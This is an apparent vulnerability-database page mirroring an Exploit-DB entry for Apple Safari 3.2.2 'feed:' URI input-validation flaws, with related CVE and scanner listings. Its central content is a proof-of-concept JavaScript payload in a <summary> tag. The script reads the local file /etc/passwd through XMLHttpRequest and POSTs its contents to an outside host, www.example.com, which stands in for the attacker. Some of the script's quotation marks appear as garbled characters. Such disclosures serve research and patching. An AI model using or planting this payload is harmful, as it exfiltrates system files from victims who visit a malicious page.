Lucene search
+L

Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities

🗓️ 12 May 2009 00:00:00Reported by Billy RiosType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Apple Safari 3.2.2 input-validation vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Mac OS X 10.5 < 10.5.7 Multiple Vulnerabilities
18 Aug 200400:00
nessus
Tenable Nessus
Safari < 3.2.3 Multiple Vulnerabilities
18 Aug 200400:00
nessus
Tenable Nessus
Mac OS X 10.5.x < 10.5.7 Multiple Vulnerabilities
13 May 200900:00
nessus
Tenable Nessus
Safari < 3.2.3 Multiple Vulnerabilities
13 May 200900:00
nessus
Circl
CVE-2009-0162
12 May 200900:00
circl
CVE
CVE-2009-0162
13 May 200915:14
cve
Cvelist
CVE-2009-0162
13 May 200915:14
cvelist
EUVD
EUVD-2009-0171
7 Oct 202500:30
euvd
NVD
CVE-2009-0162
13 May 200915:30
nvd
OpenVAS
Mac OS X 10.5.7 Update / Mac OS X Security Update 2009-002
12 May 201000:00
openvas
Rows per page
source: https://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3.

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(�GET�, �file:///etc/passwd�, true);
req.send(�);

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(�POST�, �http://www.example.com�, true);
req2.setRequestHeader(�Content-Type�,'application/x-www-form-urlencoded�);
req2.send(�filename=etcpasswd&filecontents=�+escape(stuff));
}
</script>
</summary>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.05354
24